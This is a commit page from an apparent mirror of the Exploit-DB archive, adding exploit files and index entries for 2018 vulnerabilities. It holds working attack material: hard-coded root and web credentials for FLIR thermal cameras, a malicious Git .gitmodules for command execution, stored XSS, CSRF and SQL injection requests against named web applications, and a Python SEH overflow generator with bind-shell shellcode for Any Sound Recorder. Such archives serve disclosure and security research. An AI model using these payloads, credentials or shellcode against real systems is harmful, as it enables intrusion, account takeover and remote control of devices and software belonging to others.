bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-18

Browse source 
15 changes to exploits/shellcodes

Git Submodule - Arbitrary Code Execution
Git Submodule - Arbitrary Code Execution (PoC)
Any Sound Recorder 2.93 - Buffer Overflow (SEH)
Git Submodule - Arbitrary Code Execution

Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)

Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials
BigTree CMS 4.2.23 - Cross-Site Scripting
Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)
TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure
Time and Expense Management System 3.0 - 'table' SQL Injection
This commit is contained in:
Offensive Security 2018-10-18 05:01:46 +00:00
parent 712d629b6b
commit 635345499a
12 changed files with 409 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
exploits/hardware/remote/45629.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3
# Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5494
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5494.php
# Desc: The devices utilizes hard-coded and credentials within its Linux distribution
# image. These sets of credentials (SSH) are never exposed to the end-user and cannot
# be changed through any normal operation of the camera. Attacker could exploit this
# vulnerability by logging in using the default credentials for the web panel or gain
# shell access.
# Hard-coded SSH access:
# ----------------------
fliruser:3vlig
root:hello
# Default web creds:
# ------------------
admin:admin
user:user
viewer:viewer
service:???
developer:???

19
exploits/hardware/webapps/45632.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-17
# Vendor: TP-LINK Technologies Co., Ltd.
# Product web page: http://www.tp-link.com
# Affected version: 1.6.18P12_121101
# Tested on: Boa/0.94.14rc21
# CVE: N/A
# References:
# Advisory ID: ZSL-2018-5497
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5497.php
Desc: The TP-Link TL-SC3130 suffers from an unauthenticated and unauthorized
live RTSP stream disclosure.
# PoC:
http://TARGET/jpg/image.jpg
rtsp://TARGET:554/video.3gp

82
exploits/linux/local/45631.md Normal file
View file

@ -0,0 +1,82 @@
# CVE-2018-17456
I've gotten a couple of questions about exploitation for the
[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we
go with some technical details.
## TL;DR
[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.
EDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip
## Exploitation
The `.gitmodules` file looks as follows:
```
[submodule "x:x"]
path = x:x
url = -u./payload
```
The actual command being injected is set by the url, `-u./payload`
points the `upload-pack` flag of git clone to the `payload` shell
script. Note also the `:` within the path, this part is needed to
actually get the `payload` script executed.
The path will end up as the repository URL in the subsequent `clone`
operation:
```
execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone",
"--no-checkout", "--progress", "--separate-git-dir",
"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],...
```
As the actual URL from `.gitmodules` is interpreted as the `-u`
argument.
The colon is due to the fact, that the colon character let us go past
those lines in `transport.c`:
```c
} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {
struct bundle_transport_data *data = xcalloc(1, sizeof(*data));
transport_check_allowed("file");
ret->data = data;
ret->vtable = &bundle_vtable;
ret->smart_options = NULL;
```
Due to `url_is_local_not_ssh` will return false due to the colon
in the path. And therefore later on in the code the smart_options
containing the `uploadpack` setting are still in place:
```c
} else {
/* Unknown protocol in URL. Pass to external handler. */
int len = external_specification_len(url);
char *handler = xmemdupz(url, len);
transport_helper_init(ret, handler);
}
if (ret->smart_options) {
ret->smart_options->thin = 1;
ret->smart_options->uploadpack = "git-upload-pack";
if (remote->uploadpack)
ret->smart_options->uploadpack = remote->uploadpack;
ret->smart_options->receivepack = "git-receive-pack";1
if (remote->receivepack)
ret->smart_options->receivepack = remote->receivepack;
}
```
## Further hints
The constraint to have a colon in the `path` seems to hinder exploitation on Windows
as a colon is a forbidden character within a path on Windows. However as noted by
some people during the disclosure: Git running within the Windows Subsystem for Linux or
cygwin will allow exploitation on Windows hosts.
Etienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)
earlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592).

40
exploits/php/webapps/45628.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: BigTree CMS 4.2.23 - Cross-Site Scripting
# Date: 2018-10-15
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link : https://github.com/bigtreecms/BigTree-CMS/
# Software : BigTree CMS
# Version : 4.2.23
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2018-18308
# In the 4.2.23 version of BigTree, a Stored XSS vulnerability has been discovered
# in /admin/ajax/file-browser/upload/ (aka the image upload area).
# HTTP POST Request :
POST /admin/ajax/file-browser/upload/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/admin/pages/add/0/
Content-Type: multipart/form-data; boundary=---------------------------15148507251045999311737722822
Content-Length: 1574699
Cookie: __utma=242042641.1054742390.1539547796.1539547796.1539547796.1; __utmb=242042641.6.10.1539547796; __utmc=242042641; __utmz=242042641.1539547796.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=fat2c61gglprnotletf1mobnui; hide_bigtree_bar=; bigtree_admin[email]=test%40ismailtasdelen.me; bigtree_admin[login]=%5B%22session-5bc3a4ae5b8016.12355027%22%2C%22chain-5bc3a4ae5b7966.37991866%22%5D; bigtree_admin%5Bpage_properties_open%5D=on
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="__csrf_token_B2FHVMV815XHACWV8RVV2BTX1EH1YEH6__"
tNvtUi8PU/IDcrgxj1t/Uv/1ciYeF7AudslXD429hkQ=
-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="folder"
0
-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="files[]"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg

48
exploits/php/webapps/45630.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-10-17
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.initechs.com/
# Software Link: http://sourceforge.net/projects/tems/files/latest
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Description
# Normal member has all rights.
# POC:
# 1)
# #Add,edit,delete admin+all users...
# http://localhost/[PATH]/index.php?action=ListUser
# http://localhost/[PATH]/index.php?action=BrowseUser&uid=1
# Etc..
#Update admin..
POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
action=EditUser&uid=1&fullname=Administrator_Edit&email=admin@admin.com&title=Administrator_Edit&joindate=10%2F17%2F2018&reportto=admin&usergroup=&language=ENG&dateformat=MDY&status=10&debuglevel=3&dbtracelevel=0&preview_receipt=1
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2018 00:46:35 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 10
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# /* `exploitdb`.`users` */
# $users = array(
# array('uid' => '1','users_id' => 'admin','fullname' => 'Administrator_Edit','password' => '5ebf8364d17c8df7e4afd586c24f84a0','email' => 'admin@admin.com','joindate' => '2018-10-17','reportto' => 'admin','title' => 'Administrator_Edit','status' => '10','authorizations_id' => '1','usergroup' => '','dateformat' => 'MDY','language' => 'ENG','u_menu_id' => '1','lastloginat' => '2018-10-17 00:46:50','access_count' => '4','debuglevel' => '3','dbtracelevel' => '0','preview_receipt' => '1','createat' => '2018-10-17 00:26:09','createby' => '*SYSTEM','changeat' => '2018-10-17 00:47:42','changeby' => 'efe')
# );

105
exploits/php/webapps/45633.txt Normal file
View file

@ -0,0 +1,105 @@
# Exploit Title: Time and Expense Management System 3.0 - 'table' SQL Injection
# Dork: N/A
# Date: 2018-10-17
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.initechs.com/
# Software Link: http://sourceforge.net/projects/tems/files/latest
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/core/model/GetTips.php?table=[SQL]
# /[PATH]/core/model/GetTips.class.php
# ........
# $hints_per_page = $_SESSION['ini']['display']['number_of_hints'];
# $userEntry=ltrim($_GET["userentry"]);
# $table = $_GET["table"];
# $key = $_GET["field"];
# $addlCond = $_GET["addl_cond"];
# ........
GET /[PATH]/core/model/GetTips.php?table=112112+anD++EXtrACTvaLUE(112,ConcAT(0x5c,conCAT_WS(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT+(ELT(112=112,112))),0x49687361126e2053656e6361126e))--+Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2018 01:02:25 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=0kunt4k4d2piurnrcle7nftln5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1612
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/core/model/GetTips.php?field=[SQL]
# /[PATH]/core/model/GetTips.class.php
# ........
# $hints_per_page = $_SESSION['ini']['display']['number_of_hints'];
# $userEntry=ltrim($_GET["userentry"]);
# $table = $_GET["table"];
# $key = $_GET["field"];
# $addlCond = $_GET["addl_cond"];
# ........
GET /[PATH]/core/model/GetTips.php?field=112112+anD++EXtrACTvaLUE(112,ConcAT(0x5c,conCAT_WS(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT+(ELT(112=112,112))),0x49687361126e2053656e6361126e))--+Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0kunt4k4d2piurnrcle7nftln5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2018 01:09:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1811
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/core/controller/UpdateBORequest.php[SQL]
# POST /action=[SQL]
#
POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
action=EditUser' anD EXtrACTvaLUE(112,ConcAT(0x5c,conCAT(0x203a20,useR(),DAtabaSE(),VersiON()),(SeleCT (ELT(112=112,112))),0x49687361126e2053656e6361126e))-- Efe
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2018 01:12:24 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1778
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

4
exploits/windows_x86-64/remote/42031.py → exploits/windows/remote/42031.py
View file

@ -8,6 +8,10 @@ import socket
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
EDB Note: Shellcode
- x64 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42030.asm
- x86 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42031.asm
Tested on:
- Windows 7 SP1 x64
- Windows 2008 R2 SP1 x64

2
exploits/windows/remote/42315.py
View file

@ -9,6 +9,8 @@ import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed

0
exploits/windows/remote/41987.py → exploits/windows_x86-64/remote/41987.py
View file

4
exploits/windows_x86-64/remote/42030.py
View file

@ -9,6 +9,10 @@ EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
The exploit support only x64 target
EDB Note: Shellcode
- x64 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42030.asm
- x86 ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42031.asm
Tested on:
- Windows 2012 R2 x64
- Windows 8.1 x64

63
exploits/windows_x86/local/45627.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
# Exploit Author: Abdullah Alic
# Discovery Date: 2018-10-16
# Homepage: http://www.any-sound-recorder.com
# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: 2.93
# Tested on: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "boom.txt". Copy the content of the "boom.txt".
# Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
# Connect victim machine on port 4444
#!/usr/bin/python
#Payload size: 355 bytes
#msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7"
buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6"
buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b"
buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92"
buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b"
buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85"
buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d"
buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07"
buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0"
buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08"
buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d"
buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26"
buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e"
buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce"
buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d"
buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82"
buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80"
buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9"
buf += "\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19"
buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54"
buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4"
buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05"
buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f"
buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a"
buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b"
buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62"
buf += "\x98\x86\x36\xa7"
junk = 10000
nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes
seh= "\x35\x2f\xd1\x72" # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c FROM msacm32.drv
buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf))
payload = buffer
#badchars \x00 \x0a \x0d
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

13
files_exploits.csv
View file

@ -10023,7 +10023,7 @@ id,file,description,date,author,type,platform,port
45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux,
45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux,
45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)",2018-10-04,"Miguel Mendez Z",local,windows_x86,
45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution",2018-10-05,"Junio C Hamano",local,linux,
45548,exploits/linux/local/45548.txt,"Git Submodule - Arbitrary Code Execution (PoC)",2018-10-05,"Junio C Hamano",local,linux,
45553,exploits/linux/local/45553.c,"Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation",2018-10-02,Lexfo,local,linux,
45560,exploits/windows/local/45560.rb,"Zahir Enterprise Plus 6 - Stack Buffer Overflow (Metasploit)",2018-10-08,Metasploit,local,windows,
45562,exploits/windows/local/45562.rb,"Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)",2018-10-08,Metasploit,local,windows,
@ -10035,6 +10035,8 @@ id,file,description,date,author,type,platform,port
45598,exploits/windows_x86/local/45598.py,"Snes9K 0.0.9z - Buffer Overflow (SEH)",2018-10-15,"Abdullah Alıç",local,windows_x86,
45625,exploits/solaris/local/45625.rb,"Solaris - RSH Stack Clash Privilege Escalation (Metasploit)",2018-10-16,Metasploit,local,solaris,
45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16578,7 +16580,7 @@ id,file,description,date,author,type,platform,port
42587,exploits/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,remote,hardware,9251
42316,exploits/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,remote,windows,
42779,exploits/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)",2017-09-25,Metasploit,remote,linux,9001
41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows,
41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64,
42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,
41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80
@ -16618,7 +16620,7 @@ id,file,description,date,author,type,platform,port
42024,exploits/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,remote,php,
42025,exploits/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,remote,php,80
42026,exploits/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",remote,xml,
42031,exploits/windows_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445
42031,exploits/windows/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows,445
42083,exploits/windows/remote/42083.rb,"Octopus Deploy - (Authenticated) Code Execution (Metasploit)",2017-05-29,Metasploit,remote,windows,
42084,exploits/linux/remote/42084.rb,"Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)",2017-05-29,Metasploit,remote,linux,
42041,exploits/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,remote,windows,
@ -16873,6 +16875,7 @@ id,file,description,date,author,type,platform,port
45561,exploits/php/remote/45561.rb,"Navigate CMS - Unauthenticated Remote Code Execution (Metasploit)",2018-10-08,Metasploit,remote,php,
45574,exploits/windows/remote/45574.rb,"Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)",2018-10-09,Metasploit,remote,windows,502
45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows,
45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40143,3 +40146,7 @@ id,file,description,date,author,type,platform,port
45621,exploits/php/webapps/45621.txt,"MV Video Sharing Software 1.2 - 'searchname' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
45622,exploits/php/webapps/45622.txt,"GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,
45623,exploits/hardware/webapps/45623.sh,"Heatmiser Wifi Thermostat 1.7 - Credential Disclosure",2018-10-16,d0wnp0ur,webapps,hardware,
45628,exploits/php/webapps/45628.txt,"BigTree CMS 4.2.23 - Cross-Site Scripting",2018-10-17,"Ismail Tasdelen",webapps,php,
45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php,
45632,exploits/hardware/webapps/45632.txt,"TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure",2018-10-17,LiquidWorm,webapps,hardware,
45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,

Can't render this file because it is too large.